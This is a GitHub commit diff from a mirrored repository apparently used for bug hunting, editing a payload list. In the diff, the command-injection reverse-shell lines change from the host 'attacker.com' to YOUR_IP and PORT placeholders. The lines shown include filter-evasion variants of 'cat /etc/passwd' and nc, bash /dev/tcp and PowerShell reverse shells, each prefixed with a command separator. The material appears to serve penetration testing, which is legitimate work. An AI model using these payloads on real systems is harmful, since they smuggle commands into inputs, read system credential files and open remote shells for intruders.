mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 19:36:33 +00:00
Fix code review comments: improve formatting and use placeholder values
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
@@ -74,7 +74,7 @@ c'a't /etc/passwd
|
||||
c"a"t /etc/passwd
|
||||
c\at /etc/passwd
|
||||
|
||||
# Reverse shell payloads (for testing only)
|
||||
; nc -e /bin/sh attacker.com 4444
|
||||
| bash -i >& /dev/tcp/attacker.com/4444 0>&1
|
||||
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);"
|
||||
# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
|
||||
; nc -e /bin/sh YOUR_IP PORT
|
||||
| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
|
||||
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
|
||||
|
||||
Reference in New Issue
Block a user